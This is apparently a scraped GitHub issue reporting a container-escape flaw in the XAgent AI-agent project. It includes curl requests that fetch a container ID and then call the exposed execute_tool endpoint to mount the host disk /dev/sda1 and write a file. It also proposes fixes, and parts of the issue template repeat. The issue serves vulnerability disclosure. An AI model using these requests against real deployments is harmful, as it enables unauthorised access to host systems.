Open ac0d3r opened 9 months ago
Docker Enabling Privileged Mode Causes Container Escapes.
git clone https://github.com/OpenBMB/XAgent.git docker-compose up -d
curl -v --request POST 'http://localhost:8080/get_cookie' ... < HTTP/1.1 200 OK ... < set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax ...
Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;
set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;
curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \ '{ "tool_name":"shell_command_executor", "arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"} }'
Not expose the ToolServerManager service:
Disabling Privileged Mode:https://github.com/OpenBMB/XAgent/blob/main/assets/config/manager.yml#L16
If possible, please provide relevant screenshots or logs of the error. / 如果可能,请提供相关的错误截图或日志文件。
If you have any additional information or notes, please add them here. / 如果有其他补充信息,请在此处添加。
Issue Description / 问题描述
Docker Enabling Privileged Mode Causes Container Escapes.
Steps to Reproduce / 复现步骤
Extract container ID:
set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;Expected Behavior / 预期行为
Not expose the ToolServerManager service:
Disabling Privileged Mode:https://github.com/OpenBMB/XAgent/blob/main/assets/config/manager.yml#L16
Environment / 环境信息
Error Screenshots or Logs / 错误截图或日志
If possible, please provide relevant screenshots or logs of the error. / 如果可能,请提供相关的错误截图或日志文件。
Additional Notes / 其他备注
If you have any additional information or notes, please add them here. / 如果有其他补充信息,请在此处添加。